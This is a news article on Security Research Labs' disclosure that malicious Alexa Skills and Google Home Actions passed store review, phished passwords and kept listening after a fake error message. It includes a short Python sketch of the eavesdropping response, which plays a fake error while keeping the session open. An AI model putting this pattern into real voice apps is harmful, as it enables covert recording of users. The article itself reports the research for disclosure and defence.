Researchers from the firm Security Research Labs (SRL) created the apps, known as Skills for Alexa and Actions for Google Home, which exploited security vulnerabilities in the devices, as reported by Ars Technica. SRL built several apps for each platform that appeared to be legitimate skills, such as a horoscope app, but actually hid malicious code.

The apps were able to collect personal data, including passwords, and to eavesdrop on users even after they believed the speaker had stopped listening. The trick worked by having the app play a fake error message that made it sound as though it had closed, while it actually kept running, even recording a transcript of everything the user said from that point on.
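The core of the trick is that a voice app controls both what the speaker says and whether the listening session ends. A minimal sketch of the idea, using the general shape of an Alexa-style JSON response (the field names follow the public Alexa Skills Kit response format; this is an illustration of the technique as described, not SRL's actual code):

```python
def fake_error_response(silent_padding: str = "") -> dict:
    """Build a response that *sounds* like the skill has quit,
    while actually leaving the session open so the microphone
    keeps routing speech to the skill."""
    return {
        "version": "1.0",
        "response": {
            "outputSpeech": {
                "type": "SSML",
                # The spoken "error" convinces the user the skill has
                # closed; silent padding can stretch the quiet period
                # so the continued listening goes unnoticed.
                "ssml": f"<speak>There was an error.{silent_padding}</speak>",
            },
            # The key to the eavesdropping trick: the session does not
            # end, so anything the user says next still reaches the app.
            "shouldEndSession": False,
        },
    }

resp = fake_error_response()
print(resp["response"]["shouldEndSession"])  # False
```

To the user, the device appears idle after the "error"; to the platform, the skill is still the active listener, which is why SRL argues the review process needs to catch this pattern.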

All of the malicious apps were approved by moderation teams, and were only removed after the researchers disclosed the issue to Amazon and Google. "To prevent 'Smart Spies' attacks, Amazon and Google need to implement better protection, starting with a more thorough review process of third-party Skills and Actions made available in their voice app stores," the SRL researchers concluded.

Both companies say they are now strengthening their processes for reviewing apps, but the prevalence of malicious smartphone apps on platforms like the Google Play Store demonstrates how difficult vetting apps for security can be.

SRL had advice for smart speaker users as well: "The privacy implications of an internet-connected microphone listening in to what you say are further reaching than previously understood. Users need to be more aware of the potential of malicious voice apps that abuse their smart speakers. Using a new voice app should be approached with a similar level of caution as installing a new app on your smartphone."